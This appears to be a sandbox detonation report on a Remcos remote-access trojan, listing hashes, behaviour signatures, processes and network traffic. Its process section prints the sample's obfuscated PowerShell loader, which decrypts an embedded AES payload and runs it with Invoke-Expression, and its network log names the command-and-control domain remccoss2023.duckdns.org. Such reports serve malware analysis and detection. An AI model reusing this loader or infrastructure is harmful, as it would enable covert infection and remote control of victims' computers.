| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
Files
memory/2916-4-0x00000237E6750000-0x00000237E6772000-memory.dmp
memory/2916-5-0x00007FFA38430000-0x00007FFA38E1C000-memory.dmp
memory/2916-7-0x00000237FE9B0000-0x00000237FE9C0000-memory.dmp
memory/2916-9-0x00000237FE9B0000-0x00000237FE9C0000-memory.dmp
memory/2916-10-0x00000237FEB40000-0x00000237FEBB6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zv00cg1g.res.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2916-25-0x00000237FE9B0000-0x00000237FE9C0000-memory.dmp
memory/2916-26-0x0000023780000000-0x00000237807A6000-memory.dmp
memory/2916-29-0x00000237FEBC0000-0x00000237FEBCC000-memory.dmp
memory/2916-34-0x0000023FFF520000-0x0000023FFF53E000-memory.dmp
memory/3172-37-0x00007FFA38430000-0x00007FFA38E1C000-memory.dmp
memory/3172-40-0x000001B32D730000-0x000001B32D740000-memory.dmp
memory/3172-41-0x000001B32D730000-0x000001B32D740000-memory.dmp
memory/4172-60-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3172-61-0x000001B32D730000-0x000001B32D740000-memory.dmp
memory/4172-68-0x0000000000400000-0x0000000000482000-memory.dmp
memory/3172-70-0x00007FFA38430000-0x00007FFA38E1C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | f6c90ab0db80c6c3ea92556fda7273c7 |
| SHA1 | 01d3866b1887cbb0abe9701f6b49c5dbc66a7dfa |
| SHA256 | a823c3b6f157c50315251d43db740ad37a736b967f0500e024e3a0f84192b269 |
| SHA512 | aa6b71e3a8fa46702787d190e3633b1ead0f66cce81065fa2262dde59c683a7fc48846fa2b0bbe94a050564855fc7a79842f0abfa53cc3315e4c766b3c4c1fbe |
memory/4172-72-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-74-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2916-71-0x00007FFA38430000-0x00007FFA38E1C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 679c08c2fcef41f7ff70c991404bbc84 |
| SHA1 | efb3707a241424adc528888f9f161d04be21ef69 |
| SHA256 | 049e9c3cc1fd8c01c6f980e8e87070d02fafa41eae7d60376b939552e7942dc1 |
| SHA512 | 1f2d713f8f3e77efaa7484bdc463ab47541b4673b1e35e77437c87cb7682185b4b76a3823768f5ceb100d7d1c0c73f123282fd4715355f3bdde4228eb455c763 |
memory/4172-75-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-77-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-78-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-79-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-80-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-81-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-82-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-83-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-84-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-85-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-86-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-88-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-89-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-90-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-91-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-92-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-93-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-95-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-96-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-97-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-98-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-99-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-100-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-102-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-103-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-104-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-105-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-106-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-107-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-108-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-109-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-111-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-112-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-113-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-114-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-115-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-116-0x0000000000400000-0x0000000000482000-memory.dmp
C:\ProgramData\remcos\registros.dat
| MD5 | bf306e98b8575f3eb0fa3b040090ef41 |
| SHA1 | a50e3c21a00c91aa9af6074816ae9b76dd86c1c0 |
| SHA256 | b0e14b0220c5c706e1f98ff3754f20a7fa1f9b0d3a31555a645a690423770644 |
| SHA512 | 8ddf6857be95e63bdd759c60a888b44f12573b49a57abb5925763b3d7ae6b27363136f43472264bc88e1d38e63357aee52a641fd05481c126af24051e982f5b1 |
memory/4172-118-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-119-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-120-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-121-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-122-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-123-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-124-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-125-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-127-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-128-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-129-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-130-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-131-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-132-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-133-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-135-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-136-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-137-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-138-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-139-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4172-140-0x0000000000400000-0x0000000000482000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2023-12-05 18:38
Reported
2023-12-05 18:44
Platform
win10v2004-20231127-en
Max time kernel
300s
Max time network
305s
Command Line
Signatures
Remcos
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3028534956-1709433221-1313273668-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1348 set thread context of 4388 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\envifa.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function Decrypt-AESEncryption{Param([String]$CBGNKODNPÇ,[String]$Keygfhfghfgiy)$OGjnLfnOaç = New-Object System.Security.Cryptography.AesManaged;$OGjnLfnOaç.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OGjnLfnOaç.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$OGjnLfnOaç.BlockSize = 128;$OGjnLfnOaç.KeySize = 256;$OGjnLfnOaç.Key = (New-Object System.Security.Cryptography.SHA256Managed).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Keygfhfghfgiy));$BxwZvbgNLo = [System.Convert]::FromBase64String($CBGNKODNPÇ);$OGjnLfnOaç.IV = $BxwZvbgNLo[0..15];$decryptor = $OGjnLfnOaç.CreateDecryptor();$geLJgUoUQL = $decryptor.TransformFinalBlock($BxwZvbgNLo, 16, $BxwZvbgNLo.Length - 16);$OGjnLfnOaç.Dispose();return [System.Text.Encoding]::UTF8.GetString($geLJgUoUQL).Trim([char]0)}$qROuE = '58417081275505453806';$MqDDxKjJmA = 'k8qwzV8P21gGtVOd7SAXmfQRh03MJ8Ged4nJeFFrdUwM2fadaBY/VhUNeySTG+oRhJ9e56m8gBh4H+lvV3bGt5/4/STem83phMPT5OiQ1pJCN7POF3qxkETdQB1FBgemfV/Sb5PgEuhjs+4iar71WgBaMwmf0egTMyDORL3mT8ucIk/Tro4TtYXBtNVzQnKSKybtqfPKA4qjsO4Rxg3JhxINiAwILViH1c/eV5ymyCnUye5q3UBG5U/M/HtIEHiJEzRqK7TvGFqMXJLPSFhYoQSsEJ6QRBfrnKoYlWSi3+iwj5b1hYRSTnCIuEr7l0jt17vlkvrfq/GatFniAvDUg8SwY98T2yvAl6j1L+2KOg6rnY9odExu2H4pBKVXyD5i6vI7mFEP7RWmE36WXZKeulXG7ZiX5L82vA1uPpnHGC9qpq7YadP/1pxZUt+/Duv0rti0jdyjKVBZiwK+DeIhSGnrQaF7tTREeBIITWLarMrwnlvyXwORDEMWFo61NzGUQoh9DNOfFFrjALQoJdh4V6fqhUUBECbhpY8syBN12l2pDXF/+COo5yyN7yYND0d3rP6M7ZTzdUFJ0wcoZGFiB0K1DQPh+e6k2EvRlSfPhkLfO9LpdCv3JMgTEahtfb0jgmDzX1sq3ZHyXHy/zTaoRRuAtjktJPQVhTZOopGXv6Xak5FmtZF4KN6HWt41P2kAeuMGCfXRA71xIiv/ZZa5w6TUs0e4mVj+mtKoph2m0shsuvBEGPsBYfbT+l4AqEsPi6bV47Yml1bm22e/iBcrEY5CvgLbuNVwDN881rO2/EzWh3b3buHpTW8OKWdXY//WbmNiKiErwSITIYqAs/yvZHgtx62BtfqzrtS3CHGzmP2ziY0sAGmlQl7f7xoC+6Pz0fqO/s3fgOv0Ti9TiZIlzOv/5aOHwZXtFeWHOEMthan8J/261I9yW9JWGdc42XVOnr04TuITT6m7d8t+02s1ftDwrPTUXdLfZvXxvwNR8Qpm8LquSwMajLiDrn1gpBLficCnjZlh7bZVW6vsjpLDhGQU8xjPTJwz3hRlq1lR7Ddi/op236ZEEiAPW+ulcm/W128KYkg/8CsfbDGsZoopcwKClQRDk2jVUuy3kAnz4o3fSTpt8UTWmua6l2q6S37Hyk6Dh14U06Ih4qxL6QAi9jV9XT3AyHOdzT7cYTopKGn9Jpa847OqUI/ixnyXdRr07jxmCR9JC0ZcxGLe0/6dWZqmj/hSOOaoLB6G3iLHuo9pXMQ6QE3Iwk6+uigKC+q6AWNRkz2yI1Ms7mgylxYJLmjCR3urwbGQRdz5SQNwYIY435VyYp7PNEEYDH1Su164ceW2UyoIAVdlI9h6lMfCRWS32zFWnTfw7X5u1ASMdpZPjITVPrKgN3st4K4Okg38K6fAkOZMFzIK/rPiHN1jMEvLn2lNcSj53sWoxCdJcDZEJxbIxCbg258lVibR8l4mea9/Gm1Du4honGCCOQ04OrLgDjcjUFHm6IPapDXlXXlO3qLShW2WkTBVLNmo2mCyb3Khg8tg1HNmypVIRH9bYbWNq5PwLiE4i0gRO8zpFbtoyvZ4A1LUdLmR6gEriE4mjChgL4kT0stuG8d4RpNeIhdxAQjEu1G3UUA5+JusNv5I03apj3rG0awF+5Fx2p61XY83VNbUu6pPOFL08zV64IDK6PaPi7zJ92FbkSYiPjloT8S23k3G/lw6Iw8l1dfmpEC6tRhGoOuqFN1QWwUf8ietmQoZ7aG+vk0Dp5MaHcgSqpAFIudPkgx2UPM8/PCAHw9dlm4H1gLBMSPQxiWhjfFpCF1+DPZDVNt5csuwhqr5gz6O3oLoXvqR+Y5Qpen0ZijFlIsD/sCyFa6ia7R8yT7eAzqAYqaTCuTNVBIuu4/i7tMEJBDytK1XZvwnuwn8urP3S0I3goQmUlECx6iUkg+3bOTTYzXHFbDHP5Mq2zQLnyiHUV38V5PRcY9BL/ByuJlLdILx1lWIglQPsmHUXr2P9jd3Sl9bnql2F8rP4a7XY65ORGh2uRpjBO5TO7lVKdLbzyfU20BSjwv5PyYH57NcYkpzXfNnWxNUsWryAvk=';$GmtBWLkcKU = Decrypt-AESEncryption -CBGNKODNPÇ $MqDDxKjJmA -Key $qROuE;Invoke-Expression $GmtBWLkcKU
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\google.vbs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.78.124.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.255.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | paste.ee | udp |
| US | 188.114.96.0:443 | paste.ee | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 0.96.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.173.246.72.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 233.134.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | remccoss2023.duckdns.org | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 155.162.142.181.in-addr.arpa | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | 61.122.16.96.in-addr.arpa | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | 81.254.221.88.in-addr.arpa | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | remccoss2023.duckdns.org | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | remccoss2023.duckdns.org | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | 12.173.189.20.in-addr.arpa | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| US | 8.8.8.8:53 | remccoss2023.duckdns.org | udp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
| CO | 181.142.162.155:4576 | remccoss2023.duckdns.org | tcp |
